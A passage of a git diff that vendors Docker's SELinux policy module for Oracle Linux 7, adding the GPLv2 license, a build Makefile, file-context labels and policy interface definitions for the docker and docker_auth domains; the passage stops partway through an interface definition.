+manage_dirs_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t)
+manage_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t)
+manage_sock_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t)
+manage_lnk_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t)
+files_pid_filetrans(docker_auth_t, docker_plugin_var_run_t, { dir file lnk_file sock_file })
+
+domain_use_interactive_fds(docker_auth_t)
+
+kernel_read_net_sysctls(docker_auth_t)
+
+auth_use_nsswitch(docker_auth_t)
+
+files_read_etc_files(docker_auth_t)
+
+miscfiles_read_localization(docker_auth_t)
+
+sysnet_dns_name_resolve(docker_auth_t)
diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE
new file mode 100644
index 0000000000..d511905c16
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE
@@ -0,0 +1,339 @@
+		    GNU GENERAL PUBLIC LICENSE
+		       Version 2, June 1991
+
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
+ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+			    Preamble
+
+  The licenses for most software are designed to take away your
+freedom to share and change it.  By contrast, the GNU General Public
+License is intended to guarantee your freedom to share and change free
+software--to make sure the software is free for all its users.  This
+General Public License applies to most of the Free Software
+Foundation's software and to any other program whose authors commit to
+using it.  (Some other Free Software Foundation software is covered by
+the GNU Lesser General Public License instead.)  You can apply it to
+your programs, too.
+
+  When we speak of free software, we are referring to freedom, not
+price.  Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+this service if you wish), that you receive source code or can get it
+if you want it, that you can change the software or use pieces of it
+in new free programs; and that you know you can do these things.
+
+  To protect your rights, we need to make restrictions that forbid
+anyone to deny you these rights or to ask you to surrender the rights.
+These restrictions translate to certain responsibilities for you if you
+distribute copies of the software, or if you modify it.
+
+  For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must give the recipients all the rights that
+you have.  You must make sure that they, too, receive or can get the
+source code.  And you must show them these terms so they know their
+rights.
+
+  We protect your rights with two steps: (1) copyright the software, and
+(2) offer you this license which gives you legal permission to copy,
+distribute and/or modify the software.
+
+  Also, for each author's protection and ours, we want to make certain
+that everyone understands that there is no warranty for this free
+software.  If the software is modified by someone else and passed on, we
+want its recipients to know that what they have is not the original, so
+that any problems introduced by others will not reflect on the original
+authors' reputations.
+
+  Finally, any free program is threatened constantly by software
+patents.  We wish to avoid the danger that redistributors of a free
+program will individually obtain patent licenses, in effect making the
+program proprietary.  To prevent this, we have made it clear that any
+patent must be licensed for everyone's free use or not licensed at all.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.
+
+		    GNU GENERAL PUBLIC LICENSE
+   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+  0. This License applies to any program or other work which contains
+a notice placed by the copyright holder saying it may be distributed
+under the terms of this General Public License.  The "Program", below,
+refers to any such program or work, and a "work based on the Program"
+means either the Program or any derivative work under copyright law:
+that is to say, a work containing the Program or a portion of it,
+either verbatim or with modifications and/or translated into another
+language.  (Hereinafter, translation is included without limitation in
+the term "modification".)  Each licensee is addressed as "you".
+
+Activities other than copying, distribution and modification are not
+covered by this License; they are outside its scope.  The act of
+running the Program is not restricted, and the output from the Program
+is covered only if its contents constitute a work based on the
+Program (independent of having been made by running the Program).
+Whether that is true depends on what the Program does.
+
+  1. You may copy and distribute verbatim copies of the Program's
+source code as you receive it, in any medium, provided that you
+conspicuously and appropriately publish on each copy an appropriate
+copyright notice and disclaimer of warranty; keep intact all the
+notices that refer to this License and to the absence of any warranty;
+and give any other recipients of the Program a copy of this License
+along with the Program.
+
+You may charge a fee for the physical act of transferring a copy, and
+you may at your option offer warranty protection in exchange for a fee.
+
+  2. You may modify your copy or copies of the Program or any portion
+of it, thus forming a work based on the Program, and copy and
+distribute such modifications or work under the terms of Section 1
+above, provided that you also meet all of these conditions:
+
+    a) You must cause the modified files to carry prominent notices
+    stating that you changed the files and the date of any change.
+
+    b) You must cause any work that you distribute or publish, that in
+    whole or in part contains or is derived from the Program or any
+    part thereof, to be licensed as a whole at no charge to all third
+    parties under the terms of this License.
+
+    c) If the modified program normally reads commands interactively
+    when run, you must cause it, when started running for such
+    interactive use in the most ordinary way, to print or display an
+    announcement including an appropriate copyright notice and a
+    notice that there is no warranty (or else, saying that you provide
+    a warranty) and that users may redistribute the program under
+    these conditions, and telling the user how to view a copy of this
+    License.  (Exception: if the Program itself is interactive but
+    does not normally print such an announcement, your work based on
+    the Program is not required to print an announcement.)
+
+These requirements apply to the modified work as a whole.  If
+identifiable sections of that work are not derived from the Program,
+and can be reasonably considered independent and separate works in
+themselves, then this License, and its terms, do not apply to those
+sections when you distribute them as separate works.  But when you
+distribute the same sections as part of a whole which is a work based
+on the Program, the distribution of the whole must be on the terms of
+this License, whose permissions for other licensees extend to the
+entire whole, and thus to each and every part regardless of who wrote it.
+
+Thus, it is not the intent of this section to claim rights or contest
+your rights to work written entirely by you; rather, the intent is to
+exercise the right to control the distribution of derivative or
+collective works based on the Program.
+
+In addition, mere aggregation of another work not based on the Program
+with the Program (or with a work based on the Program) on a volume of
+a storage or distribution medium does not bring the other work under
+the scope of this License.
+
+  3. You may copy and distribute the Program (or a work based on it,
+under Section 2) in object code or executable form under the terms of
+Sections 1 and 2 above provided that you also do one of the following:
+
+    a) Accompany it with the complete corresponding machine-readable
+    source code, which must be distributed under the terms of Sections
+    1 and 2 above on a medium customarily used for software interchange; or,
+
+    b) Accompany it with a written offer, valid for at least three
+    years, to give any third party, for a charge no more than your
+    cost of physically performing source distribution, a complete
+    machine-readable copy of the corresponding source code, to be
+    distributed under the terms of Sections 1 and 2 above on a medium
+    customarily used for software interchange; or,
+
+    c) Accompany it with the information you received as to the offer
+    to distribute corresponding source code.  (This alternative is
+    allowed only for noncommercial distribution and only if you
+    received the program in object code or executable form with such
+    an offer, in accord with Subsection b above.)
+
+The source code for a work means the preferred form of the work for
+making modifications to it.  For an executable work, complete source
+code means all the source code for all modules it contains, plus any
+associated interface definition files, plus the scripts used to
+control compilation and installation of the executable.  However, as a
+special exception, the source code distributed need not include
+anything that is normally distributed (in either source or binary
+form) with the major components (compiler, kernel, and so on) of the
+operating system on which the executable runs, unless that component
+itself accompanies the executable.
+
+If distribution of executable or object code is made by offering
+access to copy from a designated place, then offering equivalent
+access to copy the source code from the same place counts as
+distribution of the source code, even though third parties are not
+compelled to copy the source along with the object code.
+
+  4. You may not copy, modify, sublicense, or distribute the Program
+except as expressly provided under this License.  Any attempt
+otherwise to copy, modify, sublicense or distribute the Program is
+void, and will automatically terminate your rights under this License.
+However, parties who have received copies, or rights, from you under
+this License will not have their licenses terminated so long as such
+parties remain in full compliance.
+
+  5. You are not required to accept this License, since you have not
+signed it.  However, nothing else grants you permission to modify or
+distribute the Program or its derivative works.  These actions are
+prohibited by law if you do not accept this License.  Therefore, by
+modifying or distributing the Program (or any work based on the
+Program), you indicate your acceptance of this License to do so, and
+all its terms and conditions for copying, distributing or modifying
+the Program or works based on it.
+
+  6. Each time you redistribute the Program (or any work based on the
+Program), the recipient automatically receives a license from the
+original licensor to copy, distribute or modify the Program subject to
+these terms and conditions.  You may not impose any further
+restrictions on the recipients' exercise of the rights granted herein.
+You are not responsible for enforcing compliance by third parties to
+this License.
+
+  7. If, as a consequence of a court judgment or allegation of patent
+infringement or for any other reason (not limited to patent issues),
+conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot
+distribute so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you
+may not distribute the Program at all.  For example, if a patent
+license would not permit royalty-free redistribution of the Program by
+all those who receive copies directly or indirectly through you, then
+the only way you could satisfy both it and this License would be to
+refrain entirely from distribution of the Program.
+
+If any portion of this section is held invalid or unenforceable under
+any particular circumstance, the balance of the section is intended to
+apply and the section as a whole is intended to apply in other
+circumstances.
+
+It is not the purpose of this section to induce you to infringe any
+patents or other property right claims or to contest validity of any
+such claims; this section has the sole purpose of protecting the
+integrity of the free software distribution system, which is
+implemented by public license practices.  Many people have made
+generous contributions to the wide range of software distributed
+through that system in reliance on consistent application of that
+system; it is up to the author/donor to decide if he or she is willing
+to distribute software through any other system and a licensee cannot
+impose that choice.
+
+This section is intended to make thoroughly clear what is believed to
+be a consequence of the rest of this License.
+
+  8. If the distribution and/or use of the Program is restricted in
+certain countries either by patents or by copyrighted interfaces, the
+original copyright holder who places the Program under this License
+may add an explicit geographical distribution limitation excluding
+those countries, so that distribution is permitted only in or among
+countries not thus excluded.  In such case, this License incorporates
+the limitation as if written in the body of this License.
+
+  9. The Free Software Foundation may publish revised and/or new versions
+of the General Public License from time to time.  Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+Each version is given a distinguishing version number.  If the Program
+specifies a version number of this License which applies to it and "any
+later version", you have the option of following the terms and conditions
+either of that version or of any later version published by the Free
+Software Foundation.  If the Program does not specify a version number of
+this License, you may choose any version ever published by the Free Software
+Foundation.
+
+  10. If you wish to incorporate parts of the Program into other free
+programs whose distribution conditions are different, write to the author
+to ask for permission.  For software which is copyrighted by the Free
+Software Foundation, write to the Free Software Foundation; we sometimes
+make exceptions for this.  Our decision will be guided by the two goals
+of preserving the free status of all derivatives of our free software and
+of promoting the sharing and reuse of software generally.
+
+			    NO WARRANTY
+
+  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
+FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
+OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
+PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
+OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
+TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
+PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
+REPAIR OR CORRECTION.
+
+  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
+REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
+INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
+OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
+TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
+YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
+PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGES.
+
+		     END OF TERMS AND CONDITIONS
+
+	    How to Apply These Terms to Your New Programs
+
+  If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+  To do so, attach the following notices to the program.  It is safest
+to attach them to the start of each source file to most effectively
+convey the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+    <one line to give the program's name and a brief idea of what it does.>
+    Copyright (C) <year>  <name of author>
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License along
+    with this program; if not, write to the Free Software Foundation, Inc.,
+    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+
+Also add information on how to contact you by electronic and paper mail.
+
+If the program is interactive, make it output a short notice like this
+when it starts in an interactive mode:
+
+    Gnomovision version 69, Copyright (C) year name of author
+    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
+    This is free software, and you are welcome to redistribute it
+    under certain conditions; type `show c' for details.
+
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License.  Of course, the commands you use may
+be called something other than `show w' and `show c'; they could even be
+mouse-clicks or menu items--whatever suits your program.
+
+You should also get your employer (if you work as a programmer) or your
+school, if any, to sign a "copyright disclaimer" for the program, if
+necessary.  Here is a sample; alter the names:
+
+  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
+  `Gnomovision' (which makes passes at compilers) written by James Hacker.
+
+  <signature of Ty Coon>, 1 April 1989
+  Ty Coon, President of Vice
+
+This General Public License does not permit incorporating your program into
+proprietary programs.  If your program is a subroutine library, you may
+consider it more useful to permit linking proprietary applications with the
+library.  If this is what you want to do, use the GNU Lesser General
+Public License instead of this License.
diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile
new file mode 100644
index 0000000000..16df33ef32
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile
@@ -0,0 +1,23 @@
+TARGETS?=docker
+MODULES?=${TARGETS:=.pp.bz2}
+SHAREDIR?=/usr/share
+
+all: ${TARGETS:=.pp.bz2}
+
+%.pp.bz2: %.pp
+	@echo Compressing $^ -\> $@
+	bzip2 -9 $^
+
+%.pp: %.te
+	make -f ${SHAREDIR}/selinux/devel/Makefile $@
+
+clean:
+	rm -f *~  *.tc *.pp *.pp.bz2
+	rm -rf tmp *.tar.gz
+
+man: install
+	sepolicy manpage --domain ${TARGETS}_t
+
+install:
+	semodule -i ${TARGETS}
+
diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md
new file mode 100644
index 0000000000..7ea3117a89
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md
@@ -0,0 +1 @@
+SELinux policy for docker
diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc
new file mode 100644
index 0000000000..10b7d52a8b
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc
@@ -0,0 +1,33 @@
+/root/\.docker	gen_context(system_u:object_r:docker_home_t,s0)
+
+/usr/bin/docker			--	gen_context(system_u:object_r:docker_exec_t,s0)
+/usr/bin/docker-novolume-plugin		--	gen_context(system_u:object_r:docker_auth_exec_t,s0)
+/usr/lib/docker/docker-novolume-plugin	--	gen_context(system_u:object_r:docker_auth_exec_t,s0)
+
+/usr/lib/systemd/system/docker.service		--	gen_context(system_u:object_r:docker_unit_file_t,s0)
+/usr/lib/systemd/system/docker-novolume-plugin.service	--	gen_context(system_u:object_r:docker_unit_file_t,s0)
+
+/etc/docker(/.*)?		gen_context(system_u:object_r:docker_config_t,s0)
+
+/var/lib/docker(/.*)?		gen_context(system_u:object_r:docker_var_lib_t,s0)
+/var/lib/kublet(/.*)?		gen_context(system_u:object_r:docker_var_lib_t,s0)
+/var/lib/docker/vfs(/.*)?	gen_context(system_u:object_r:svirt_sandbox_file_t,s0)
+
+/var/run/docker(/.*)?		gen_context(system_u:object_r:docker_var_run_t,s0)
+/var/run/docker\.pid		--	gen_context(system_u:object_r:docker_var_run_t,s0)
+/var/run/docker\.sock		-s	gen_context(system_u:object_r:docker_var_run_t,s0)
+/var/run/docker-client(/.*)?		gen_context(system_u:object_r:docker_var_run_t,s0)
+/var/run/docker/plugins(/.*)?		gen_context(system_u:object_r:docker_plugin_var_run_t,s0)
+
+/var/lock/lxc(/.*)?		gen_context(system_u:object_r:docker_lock_t,s0)
+
+/var/log/lxc(/.*)?		gen_context(system_u:object_r:docker_log_t,s0)
+
+/var/lib/docker/init(/.*)?		gen_context(system_u:object_r:docker_share_t,s0)
+/var/lib/docker/containers/.*/hosts		gen_context(system_u:object_r:docker_share_t,s0)
+/var/lib/docker/containers/.*/hostname		gen_context(system_u:object_r:docker_share_t,s0)
+/var/lib/docker/.*/config\.env	gen_context(system_u:object_r:docker_share_t,s0)
+
+# OL7.2 systemd selinux update
+/var/run/systemd/machines(/.*)?        gen_context(system_u:object_r:systemd_machined_var_run_t,s0)
+/var/lib/machines(/.*)?                        gen_context(system_u:object_r:systemd_machined_var_lib_t,s0)
diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if
new file mode 100644
index 0000000000..4780af05f7
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if
@@ -0,0 +1,659 @@
+
+## <summary>The open-source application container engine.</summary>
+
+########################################
+## <summary>
+##	Execute docker in the docker domain.
+## </summary>
+## <param name="domain">
+## <summary>
+##	Domain allowed to transition.
+## </summary>
+## </param>
+#
+interface(`docker_domtrans',`
+	gen_require(`
+		type docker_t, docker_exec_t;
+	')
+
+	corecmd_search_bin($1)
+	domtrans_pattern($1, docker_exec_t, docker_t)
+')
+
+########################################
+## <summary>
+##	Execute docker in the caller domain.
+## </summary>
+## <param name="domain">
+## <summary>
+##	Domain allowed to transition.
+## </summary>
+## </param>
+#
+interface(`docker_exec',`
+	gen_require(`
+		type docker_exec_t;
+	')
+
+	corecmd_search_bin($1)
+	can_exec($1, docker_exec_t)
+')
+
+########################################
+## <summary>
+##	Search docker lib directories.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_search_lib',`
+	gen_require(`
+		type docker_var_lib_t;
+	')
+
+	allow $1 docker_var_lib_t:dir search_dir_perms;
+	files_search_var_lib($1)
+')
+
+########################################
+## <summary>
+##	Execute docker lib directories.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_exec_lib',`
+	gen_require(`
+		type docker_var_lib_t;
+	')
+
+	allow $1 docker_var_lib_t:dir search_dir_perms;
+	can_exec($1, docker_var_lib_t)
+')
+
+########################################
+## <summary>
+##	Read docker lib files.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_read_lib_files',`
+	gen_require(`
+		type docker_var_lib_t;
+	')
+
+	files_search_var_lib($1)
+	read_files_pattern($1, docker_var_lib_t, docker_var_lib_t)
+')
+
+########################################
+## <summary>
+##	Read docker share files.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_read_share_files',`
+	gen_require(`
+		type docker_share_t;
+	')
+
+	files_search_var_lib($1)
+	list_dirs_pattern($1, docker_share_t, docker_share_t)
+	read_files_pattern($1, docker_share_t, docker_share_t)
+	read_lnk_files_pattern($1, docker_share_t, docker_share_t)
+')
+
+######################################
+## <summary>
+##	Allow the specified domain to execute docker shared files
+##	in the caller domain.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_exec_share_files',`
+	gen_require(`
+		type docker_share_t;
+	')
+
+	can_exec($1, docker_share_t)
+')
+
+########################################
+## <summary>
+##	Manage docker lib files.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_manage_lib_files',`
+	gen_require(`
+		type docker_var_lib_t;
+	')
+
+	files_search_var_lib($1)
+	manage_files_pattern($1, docker_var_lib_t, docker_var_lib_t)
+	manage_lnk_files_pattern($1, docker_var_lib_t, docker_var_lib_t)
+')
+
+########################################
+## <summary>
+##	Manage docker lib directories.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_manage_lib_dirs',`
+	gen_require(`
+		type docker_var_lib_t;
+	')
+
+	files_search_var_lib($1)
+	manage_dirs_pattern($1, docker_var_lib_t, docker_var_lib_t)
+')
+
+########################################
+## <summary>
+##	Create objects in a docker var lib directory
+##	with an automatic type transition to
+##	a specified private type.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+## <param name="private_type">
+##	<summary>
+##	The type of the object to create.
+##	</summary>
+## </param>
+## <param name="object_class">
+##	<summary>
+##	The class of the object to be created.
+##	</summary>
+## </param>
+## <param name="name" optional="true">
+##	<summary>
+##	The name of the object being created.
+##	</summary>
+## </param>
+#
+interface(`docker_lib_filetrans',`
+	gen_require(`
+		type docker_var_lib_t;
+	')
+
+	filetrans_pattern($1, docker_var_lib_t, $2, $3, $4)
+')
+
+########################################
+## <summary>
+##	Read docker PID files.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_read_pid_files',`
+	gen_require(`
+		type docker_var_run_t;
+	')
+
+	files_search_pids($1)
+	read_files_pattern($1, docker_var_run_t, docker_var_run_t)
+')
+
+########################################
+## <summary>
+##	Execute docker server in the docker domain.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed to transition.
+##	</summary>
+## </param>
+#
+interface(`docker_systemctl',`
+	gen_require(`
+		type docker_t;
+		type docker_unit_file_t;
+	')
+
+	systemd_exec_systemctl($1)
+	init_reload_services($1)
+        systemd_read_fifo_file_passwd_run($1)
+	allow $1 docker_unit_file_t:file read_file_perms;
+	allow $1 docker_unit_file_t:service manage_service_perms;
+
+	ps_process_pattern($1, docker_t)
+')
+
+########################################
+## <summary>
+##	Read and write docker shared memory.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_rw_sem',`
+	gen_require(`
+		type docker_t;
+	')
+
+	allow $1 docker_t:sem rw_sem_perms;
+')
+
+#######################################
+## <summary>
+##  Read and write the docker pty type.
+## </summary>
+## <param name="domain">
+##  <summary>
+##  Domain allowed access.
+##  </summary>
+## </param>
+#
+interface(`docker_use_ptys',`
+    gen_require(`
+        type docker_devpts_t;
+    ')
+
+    allow $1 docker_devpts_t:chr_file rw_term_perms;
+')
+
+#######################################
+## <summary>
+##      Allow domain to create docker content
+## </summary>
+## <param name="domain">
+##      <summary>
+##      Domain allowed access.
+##      </summary>
+## </param>
+#
+interface(`docker_filetrans_named_content',`
+
+    gen_require(`
+        type docker_var_lib_t;
+        type docker_share_t;
+    	type docker_log_t;
+	    type docker_var_run_t;
+        type docker_home_t;
+    ')
+
+    files_pid_filetrans($1, docker_var_run_t, file, "docker.pid")
+    files_pid_filetrans($1, docker_var_run_t, sock_file, "docker.sock")
+    files_pid_filetrans($1, docker_var_run_t, dir, "docker-client")
+    logging_log_filetrans($1, docker_log_t, dir, "lxc")
+    files_var_lib_filetrans($1, docker_var_lib_t, dir, "docker")
+    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "config.env")
+    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hosts")
+    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hostname")
+    filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "resolv.conf")
+    filetrans_pattern($1, docker_var_lib_t, docker_share_t, dir, "init")
+    userdom_admin_home_dir_filetrans($1, docker_home_t, dir, ".docker")
+')
+
+########################################
+## <summary>
+##	Connect to docker over a unix stream socket.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_stream_connect',`
+	gen_require(`
+		type docker_t, docker_var_run_t;
+	')
+
+	files_search_pids($1)
+	stream_connect_pattern($1, docker_var_run_t, docker_var_run_t, docker_t)
+')
+
+########################################
+## <summary>
+##	Connect to SPC containers over a unix stream socket.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_spc_stream_connect',`
+	gen_require(`
+		type spc_t, spc_var_run_t;
+	')
+
+	files_search_pids($1)
+	files_write_all_pid_sockets($1)
+	allow $1 spc_t:unix_stream_socket connectto;
+')
+
+########################################
+## <summary>
+##	All of the rules required to administrate
+##	an docker environment
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_admin',`
+	gen_require(`
+		type docker_t;
+		type docker_var_lib_t, docker_var_run_t;
+		type docker_unit_file_t;
+		type docker_lock_t;
+		type docker_log_t;
+		type docker_config_t;
+	')
+
+	allow $1 docker_t:process { ptrace signal_perms };
+	ps_process_pattern($1, docker_t)
+
+	admin_pattern($1, docker_config_t)
+
+	files_search_var_lib($1)
+	admin_pattern($1, docker_var_lib_t)
+
+	files_search_pids($1)
+	admin_pattern($1, docker_var_run_t)
+
+	files_search_locks($1)
+	admin_pattern($1, docker_lock_t)
+
+	logging_search_logs($1)
+	admin_pattern($1, docker_log_t)
+
+	docker_systemctl($1)
+	admin_pattern($1, docker_unit_file_t)
+	allow $1 docker_unit_file_t:service all_service_perms;
+
+	optional_policy(`
+		systemd_passwd_agent_exec($1)
+		systemd_read_fifo_file_passwd_run($1)
+	')
+')
+
+########################################
+## <summary>
+##	Execute docker_auth_exec_t in the docker_auth domain.
+## </summary>
+## <param name="domain">
+## <summary>
+##	Domain allowed to transition.
+## </summary>
+## </param>
+#
+interface(`docker_auth_domtrans',`
+	gen_require(`
+		type docker_auth_t, docker_auth_exec_t;
+	')
+
+	corecmd_search_bin($1)
+	domtrans_pattern($1, docker_auth_exec_t, docker_auth_t)
+')
+
+######################################
+## <summary>
+##	Execute docker_auth in the caller domain.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_auth_exec',`
+	gen_require(`
+		type docker_auth_exec_t;
+	')
+
+	corecmd_search_bin($1)
+	can_exec($1, docker_auth_exec_t)
+')
+
+########################################
+## <summary>
+##	Connect to docker_auth over a unix stream socket.
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+#
+interface(`docker_auth_stream_connect',`
+	gen_require(`
+		type docker_auth_t, docker_plugin_var_run_t;
+	')
+
+	files_search_pids($1)
+	stream_connect_pattern($1, docker_plugin_var_run_t, docker_plugin_var_run_t, docker_auth_t)
+')
+
+########################################
+## <summary>
+##	docker domain typebounds calling domain.
+## </summary>
+## <param name="domain">
+## <summary>
+##	Domain to be typebound.
+## </summary>
+## </param>
+#
+interface(`docker_typebounds',`
+	gen_require(`
+		type docker_t;
+	')
+
+	typebounds docker_t $1;
+')
+
+########################################
+## <summary>
+##	Allow any docker_exec_t to be an entrypoint of this domain
+## </summary>
+## <param name="domain">
+##	<summary>
+##	Domain allowed access.
+##	</summary>
+## </param>
+## <rolecap/>
+#
+interface(`docker_entrypoint',`
+	gen_require(`
+		type docker_exec_t;
+	')
+	allow $1 docker_exec_t:file entrypoint;
+')
+
+########################################
+## <summary>
+##     Send and receive messages from
+##     systemd machined over dbus.
+## </summary>
+## <param name="domain">
+##     <summary>
+##     Domain allowed access.
+##     </summary>
+## </param>
+#
+interface(`systemd_dbus_chat_machined',`
+       gen_require(`
+               type systemd_machined_t;
+               class dbus send_msg;
+       ')
+
+       allow $1 systemd_machined_t:dbus send_msg;
+       allow systemd_machined_t $1:dbus send_msg;
+       ps_process_pattern(systemd_machined_t, $1)
+')
+
+########################################
+## <summary>
+##     Allow any svirt_sandbox_file_t to be an entrypoint of this domain
+## </summary>
+## <param name="domain">
+##     <summary>
+##     Domain allowed access.
+##     </summary>
+## </param>
+## <rolecap/>
+#
+interface(`virt_sandbox_entrypoint',`
+       gen_require(`
+               type svirt_sandbox_file_t;
+       ')
+       allow $1 svirt_sandbox_file_t:file entrypoint;
+')
+
+########################################
+## <summary>
+##      Send and receive messages from
+##      virt over dbus.
+## </summary>
+## <param name="domain">
+##      <summary>
+##      Domain allowed access.
+##      </summary>
+## </param>
+#
+interface(`virt_dbus_chat',`
+        gen_require(`
+                type virtd_t;
+                class dbus send_msg;
+        ')
+
+        allow $1 virtd_t:dbus send_msg;
+        allow virtd_t $1:dbus send_msg;
+        ps_process_pattern(virtd_t, $1)
+')
+
+#######################################
+## <summary>
+##      Read the process state of virt sandbox containers
+## </summary>
+## <param name="domain">
+##      <summary>
+##      Domain allowed access.
+##      </summary>
+## </param>
+#
+interface(`virt_sandbox_read_state',`
+       gen_require(`
+               attribute svirt_sandbox_domain;
+       ')
+
+       ps_process_pattern($1, svirt_sandbox_domain)
+')
+
+######################################
+## <summary>
+##     Send a signal to sandbox domains
+## </summary>
+## <param name="domain">
+##      <summary>
+##      Domain allowed access.
+##      </summary>
+## </param>
+#
+interface(`virt_signal_sandbox',`
